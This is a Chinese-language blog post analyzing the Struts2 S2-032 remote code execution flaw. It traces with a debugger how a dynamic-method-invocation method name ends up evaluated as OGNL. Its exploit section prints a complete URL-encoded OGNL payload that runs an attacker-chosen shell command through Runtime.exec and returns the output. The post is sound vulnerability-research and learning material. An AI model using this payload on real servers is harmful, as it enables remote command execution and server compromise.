S2-032远程代码执行漏洞分析

0x01 前言

最近在学习java安全,第一个目标就是Struts了,准备找一些比较典型的Struts漏洞进行一系列的分析。

0x02 漏洞分析

首先,看一下官方文档
官方文档

看了一下发现是由于动态方法调用(DMI)所引起的远程代码执行,下载Struts 2.3.28和Struts 2.3.28.1进行代码分析

使用Beyond Compare比较一下两个版本的区别

排查了一下,发现在DefaultActionMapper.java中(又是这个。。)

进入代码,发现在对传入的方法名称的时候使用了cleanActionName方法进行过滤了

这个cleanActionName方法是新写的,主要是

如果方法名称不再这个pattern范围内,就不行。

既然这里存在问题,那么我就在此处下个断点,看看整个流程是如何的。

在运行代码之前,要在struts.xml中加一句

这个用来把动态方法调用开启。

看了一下DefaultActionMapper类的声明

跟之前S2-016的用法比较类似,使用?method:execute的方式调用execute方法(execute方法是struts2中默认的action调用方法,这里我本地搭建环境,为了方便就是用execute方法了)

开始访问url

程序在断点处停止了,然后一直跟进
当进入Dispatcher类中的serviceAction方法中的

选择单步跳入

一直选择单步跳入,跳到

这里的话算对了。(对了就不要停!继续跟进!)

跳到DefaultActionProxy类中的DefaultActionProxy方法中,我们可以看到这个我们传入的方法被带入到escapeHtml4进行处理

在监视器中可以看到methodName确实是我们传入的execute

这里会进行html编码、转义操作。

之后就一直单步跳出,一直跟踪到Dispatcher类的proxy.exeute()的时候再单步进入

然后在invocation.invoke()处再次单步步入

之后看到我们有一个invocation.invoke(),这个是用来执行struts2的拦截器的,在这里步入

在这里有一处:

1
resultCode = interceptor.getInterceptor().intercept(DefaultActionInvocation.this);

此处是递归执行拦截器方法,会在这里执行多次,多点几下,然后到达下面的invokeActionOnly,进入

多次步入之后就会进入DefaultActionInvoke类中的invokeAction方法中,有一个ognlUtil.getValue方法,此处会将method的名字,也就是我们传入的,可控的传入进去,当做ognl表达式来执行。

这样我们就知道了在method:后面加上我们要执行的ognl表达式即可执行任意代码了。

0x03 exp编写

1
%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse()%2C%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D)%2C%23w%3D%23res.getWriter()%2C%23a%3Dnew%20java.util.Scanner(%40java.lang.Runtime%40getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.d%5B0%5D)%2C%23str%3D%23a.hasNext()%3F%23a.next()%3A%23parameters.dd%5B0%5D%2C%23w.print(%23str)%2C%23w.close()%2C%23request.toString&cmd=ls&dd= &d=____A&encoding=UTF-8

这里需要注意的是之前我们分析的时候发现我们传入的参数会被html编码以及转义的操作,因此我们写payload的时候不能出现双引号或者单引号等等,因此这里用#parameters.cmd[0]来获取命令,并且使用`@org.apache.struts2.ServletActionContext@getResponse()`来获取response对象

0x04 总结

  • DefaultActionInvocation类中的intercept方法是用来执行拦截器的
  • Struts2的拦截器是递归调用的
  • 拦截器中的代码执行顺序,在执行Action之前,与堆栈执行顺序一致;而在Action和Result之后,则是逆序执行
  • Action层面的四个方面分别是:拦截器、Action、PreResultListener、Result
  • 在DefaultActionInvocation中的invokeAction,存在ognlUtil.getValue方法,可以执行ognl表达式
  • ognl获取response对象的方法:
    1. @ org.apache.struts2.ServletActionContext@getResponse()
    2. #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')
  • #parameters.cmd[0]等价与request.getParameter('cmd')

本文标题:S2-032远程代码执行漏洞分析

文章作者:Pino-HD

发布时间:2018年06月19日 - 19:06

最后更新:2018年06月19日 - 19:06

原始链接:https://pino-hd.github.io/2018/06/19/S2-032远程代码执行漏洞分析/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!